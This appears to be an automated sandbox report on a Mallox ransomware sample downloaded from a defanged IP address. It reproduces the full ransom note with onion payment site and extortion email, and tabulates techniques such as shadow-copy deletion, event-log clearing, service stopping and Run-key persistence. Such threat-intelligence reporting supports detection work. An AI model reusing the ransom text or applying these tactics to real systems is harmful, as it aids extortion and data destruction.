hxxp://80[.]66[.]75[.]37/a-Xgjsx[.]exe

Analysis

max time kernel
137s
max time network
318s
platform
windows10-1703_x64
resource
win10-20230220-en
resource tags

arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system
submitted
28-03-2023 15:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

http://80.66.75.37/a-Xgjsx.exe

Score

10^/10

discovery evasion persistence ransomware

Malware Config

Extracted

Path

C:\Program Files\7-Zip\Lang\FILE RECOVERY.txt

Ransom Note

Hello Your files are encrypted and can not be used To return your files in work condition you need decryption tool Follow the instructions to decrypt all your data Do not try to change or restore files yourself, this will break them If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB How to get decryption tool: 1) Download and install TOR browser by this link: https://www.torproject.org/download/ 2) If TOR blocked in your country and you can't access to the link then use any VPN software 3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin 4) Copy your private ID in the input field. Your Private key: EF95AC833AA3E8B0EEA346DB 5) You will see payment information and we can make free test decryption here Our blog of leaked companies: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion If you are unable to contact us through the site, then you can email us: mallox.resurrection@onionmail.org Waiting for a response via mail can be several days. Do not use it if you have not tried contacting through the site. �

Emails

mallox.resurrection@onionmail.org

URLs

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin

http://wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion

Signatures

Clears Windows event logs 1 TTPs 64 IoCs

evasion ransomware

Indicator Removal on Host

T1070

Processes:

wevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exe

pid	process
5900
5496
5468
7092	wevtutil.exe
1172
6756
6712
4540
5540
6048
4872
300
4220
4412
6100
1064
4104
7100
7108
4164
1288
5324
1128
5840
7060
5012
4872
6528
2428
3996
5784
4864
6084
5488
5724
6024
6784
6576	wevtutil.exe
4344
6128
6868
5144
2904
5192
5696
2524
6192
7076	wevtutil.exe
1236
5688
6644
6180
1804
6676	wevtutil.exe
1004	wevtutil.exe
5708
2624
6224
6668
2380
5276
4852
6824
4996

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Executes dropped EXE 6 IoCs

Processes:

a-Xgjsx.exea-Xgjsx.exea-Xgjsx.execmd.exea-Xgjsx.exea-Xgjsx.exe

pid process

4700 a-Xgjsx.exe
852 a-Xgjsx.exe
788 a-Xgjsx.exe
820 cmd.exe
4244 a-Xgjsx.exe
5112 a-Xgjsx.exe

pid	process
4700	a-Xgjsx.exe
852	a-Xgjsx.exe
788	a-Xgjsx.exe
820	cmd.exe
4244	a-Xgjsx.exe
5112	a-Xgjsx.exe

Modifies file permissions 1 TTPs 18 IoCs

discovery

File Permissions Modification

T1222

Processes:

takeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exetakeown.exe

pid	process
3496	takeown.exe
4784	takeown.exe
3356	takeown.exe
4612	takeown.exe
1484	takeown.exe
4160	takeown.exe
4804	takeown.exe
3744	takeown.exe
4888	takeown.exe
2872	takeown.exe
4692	takeown.exe
3592	takeown.exe
4208	takeown.exe
3404	takeown.exe
4132	takeown.exe
2632	takeown.exe
1136	takeown.exe
4452	takeown.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3346939869-2835594282-3775165920-1000\Software\Microsoft\Windows\CurrentVersion\Run	chrome.exe

Enumerates connected drives 3 TTPs 24 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

a-Xgjsx.exe

description	ioc	process
File opened (read-only)	\??\A:	a-Xgjsx.exe
File opened (read-only)	\??\F:	a-Xgjsx.exe
File opened (read-only)	\??\M:	a-Xgjsx.exe
File opened (read-only)	\??\N:	a-Xgjsx.exe
File opened (read-only)	\??\O:	a-Xgjsx.exe
File opened (read-only)	\??\Q:	a-Xgjsx.exe
File opened (read-only)	\??\S:	a-Xgjsx.exe
File opened (read-only)	\??\T:	a-Xgjsx.exe
File opened (read-only)	\??\V:	a-Xgjsx.exe
File opened (read-only)	\??\W:	a-Xgjsx.exe
File opened (read-only)	\??\X:	a-Xgjsx.exe
File opened (read-only)	\??\Y:	a-Xgjsx.exe
File opened (read-only)	\??\E:	a-Xgjsx.exe
File opened (read-only)	\??\G:	a-Xgjsx.exe
File opened (read-only)	\??\L:	a-Xgjsx.exe
File opened (read-only)	\??\R:	a-Xgjsx.exe
File opened (read-only)	\??\U:	a-Xgjsx.exe
File opened (read-only)	\??\Z:	a-Xgjsx.exe
File opened (read-only)	\??\B:	a-Xgjsx.exe
File opened (read-only)	\??\H:	a-Xgjsx.exe
File opened (read-only)	\??\I:	a-Xgjsx.exe
File opened (read-only)	\??\J:	a-Xgjsx.exe
File opened (read-only)	\??\K:	a-Xgjsx.exe
File opened (read-only)	\??\P:	a-Xgjsx.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

22 api.ipify.org
Suspicious use of SetThreadContext 1 IoCs

Processes:

a-Xgjsx.exe

description pid process target process

PID 4700 set thread context of 5112 4700 a-Xgjsx.exe a-Xgjsx.exe

flow	ioc
22	api.ipify.org

description	pid	process	target process
PID 4700 set thread context of 5112	4700	a-Xgjsx.exe	a-Xgjsx.exe

Drops file in Program Files directory 64 IoCs

Processes:

a-Xgjsx.exe

description	ioc	process
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\STUDIO\STUDIO.INF	a-Xgjsx.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\lv\LC_MESSAGES\vlc.mo	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ko-kr\ui-strings.js	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fullscreen-exit-press.svg	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Appstore\Download_on_the_App_Store_Badge_pt_135x40.svg	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupMedTile.scale-200.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Images\PiSh_placeholder.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderStoreLogo.contrast-black_scale-100.png	a-Xgjsx.exe
File created	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\contrast-black\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\AFTRNOON\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\VideoLAN\VLC\locale\ast\LC_MESSAGES\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGMN020.XML	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteNotebookWideTile.scale-150.png	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\ui-strings.js	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Grace-ul-oob.xrm-ms	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\AppxMetadata\CodeIntegrity.cat	a-Xgjsx.exe
File created	C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_neutral_split.scale-100_8wekyb3d8bbwe\microsoft.system.package.metadata\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.ui.zh_CN_5.5.0.165303.jar	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsCamera_2017.125.40.0_x64__8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraAppList.contrast-black_targetsize-96.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.XboxApp_25.25.13009.0_x64__8wekyb3d8bbwe\PRNDMediaSource.winmd	a-Xgjsx.exe
File created	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\FILE RECOVERY.txt	a-Xgjsx.exe
File created	C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\FILE RECOVERY.txt	a-Xgjsx.exe
File created	C:\Program Files\Windows Defender Advanced Threat Protection\de-DE\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusinessVL_MAK-ppd.xrm-ms	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.OneConnect_2.1701.277.0_x64__8wekyb3d8bbwe\Assets\OneConnectAppList.scale-200.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-white\AppList.targetsize-60_contrast-white.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\dropins\README.TXT	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-moreimages@3x.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\tumbleweed.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ug_60x42.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_x64__8wekyb3d8bbwe\Assets\contrast-black\MusicStoreLogo.scale-100_contrast-black.png	a-Xgjsx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\sk-sk\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\go-mobile-2x.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_KMS_Client-ppd.xrm-ms	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\MicrosoftAccount.scale-140.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\PeopleAppStoreLogo.scale-200.png	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\ui-strings.js	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\root\ui-strings.js	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\sk-sk\ui-strings.js	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ppd.xrm-ms	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\Updates\Download\PackageFiles\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageSmallTile.scale-125.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailAppList.targetsize-16.png	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\Close2x.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse_2.1.200.v20140512-1650.jar	a-Xgjsx.exe
File opened for modification	C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-140.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.DesktopAppInstaller_1.0.10252.0_x64__8wekyb3d8bbwe\resources.pri	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-30_altform-unplated.png	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\illustrations.png	a-Xgjsx.exe
File created	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedAppList.targetsize-16_contrast-black.png	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.People_10.1.10531.0_x64__8wekyb3d8bbwe\Assets\contrast-white\PeopleAppStoreLogo.scale-200.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxMailAppList.targetsize-256.png	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Themes\Western\western_background.jpg	a-Xgjsx.exe
File opened for modification	C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\OneNoteSectionGroupMedTile.scale-150.png	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\check_2x.png	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer-select\css\main-selector.css	a-Xgjsx.exe
File created	C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\FILE RECOVERY.txt	a-Xgjsx.exe
File opened for modification	C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-sa_zh_CN.jar	a-Xgjsx.exe
File opened for modification	C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\sl-si\FILE RECOVERY.txt	a-Xgjsx.exe

Drops file in Windows directory 2 IoCs

Processes:

taskmgr.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\4183903823\810424605.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\3877292338.pri	taskmgr.exe

Launches sc.exe 64 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	process
6664
3688	sc.exe
4992	sc.exe
3580	sc.exe
6200	sc.exe
6840	sc.exe
6028
6788
5200	sc.exe
4456	sc.exe
5028	sc.exe
6136	sc.exe
6376
2292	sc.exe
3320	sc.exe
2068	sc.exe
5980	sc.exe
6616	sc.exe
1064
1056	sc.exe
2672	sc.exe
6040	sc.exe
6644	sc.exe
6080	sc.exe
7076	sc.exe
4400	sc.exe
644	sc.exe
5292	sc.exe
6384	sc.exe
7060	sc.exe
5456	sc.exe
5508	sc.exe
4748	sc.exe
5544	sc.exe
5184	sc.exe
1316	sc.exe
5148	sc.exe
5992	sc.exe
500	sc.exe
4272	sc.exe
5264	sc.exe
2716	sc.exe
5744	sc.exe
3524	sc.exe
4820
6952	sc.exe
5416	sc.exe
972	sc.exe
268	sc.exe
5576	sc.exe
5436	sc.exe
5844	sc.exe
1060	sc.exe
4728	sc.exe
6028	sc.exe
1580	sc.exe
7104	sc.exe
5884	sc.exe
6132	sc.exe
6364	sc.exe
5972	sc.exe
7028	sc.exe
6228	sc.exe
6340	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

taskmgr.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Discovers systems in the same network 1 TTPs 2 IoCs
discovery

Remote System Discovery
T1018

Processes:

net.exenet.exe

pid process

3676 net.exe
7100 net.exe
Enumerates processes with tasklist 1 TTPs 6 IoCs

Process Discovery
T1057

Processes:

tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exe

pid process

6132 tasklist.exe
2612 tasklist.exe
972 tasklist.exe
4408 tasklist.exe
5200 tasklist.exe
1468 tasklist.exe

pid	process
3676	net.exe
7100	net.exe

pid	process
6132	tasklist.exe
2612	tasklist.exe
972	tasklist.exe
4408	tasklist.exe
5200	tasklist.exe
1468	tasklist.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Interacts with shadow copies 2 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exe

pid process

1056 vssadmin.exe
1568 vssadmin.exe

pid	process
1056	vssadmin.exe
1568	vssadmin.exe

Kills process with taskkill 64 IoCs

evasion

Processes:

taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exe

pid	process
1628
1460	taskkill.exe
6408
5100
1276
5388
5700
5028
6600	taskkill.exe
4132
6620
6568
5500	taskkill.exe
1796	taskkill.exe
6476
6628
5512
6344
3012
280
4776
6512
6336
5144
4896
6792
4360
6544
248
1392
5556	taskkill.exe
4904
6328
6036
5200
5824
5660
7064
5456
6984
5536
6620	taskkill.exe
5460	taskkill.exe
6080
5888
6316
6580
5624
7124
4760
3324
4372	taskkill.exe
408
6052	taskkill.exe
6380
6380	taskkill.exe
5392
2836
4408
4116
2056
4984
5424	taskkill.exe
5540	taskkill.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133244985969488387"	chrome.exe

Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

pid process

4756

pid	process
4756

Suspicious behavior: EnumeratesProcesses 53 IoCs

Processes:

chrome.exepowershell.exetaskmgr.exea-Xgjsx.exea-Xgjsx.exe

pid	process
996	chrome.exe
996	chrome.exe
1156	powershell.exe
1156	powershell.exe
1156	powershell.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
4700	a-Xgjsx.exe
4700	a-Xgjsx.exe
4700	a-Xgjsx.exe
4700	a-Xgjsx.exe
4700	a-Xgjsx.exe
4700	a-Xgjsx.exe
4700	a-Xgjsx.exe
4700	a-Xgjsx.exe
504	taskmgr.exe
5112	a-Xgjsx.exe
5112	a-Xgjsx.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 2 IoCs

Processes:

chrome.exe

pid process

996 chrome.exe
996 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exea-Xgjsx.exepowershell.exetaskmgr.exea-Xgjsx.exe

description	pid	process
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeDebugPrivilege	4700	a-Xgjsx.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeDebugPrivilege	1156	powershell.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeShutdownPrivilege	996	chrome.exe
Token: SeCreatePagefilePrivilege	996	chrome.exe
Token: SeDebugPrivilege	504	taskmgr.exe
Token: SeSystemProfilePrivilege	504	taskmgr.exe
Token: SeCreateGlobalPrivilege	504	taskmgr.exe
Token: SeTakeOwnershipPrivilege	5112	a-Xgjsx.exe

Suspicious use of FindShellTrayWindow 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe
504	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

Processes:

chrome.exetaskmgr.exe

pid	process
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
996	chrome.exe
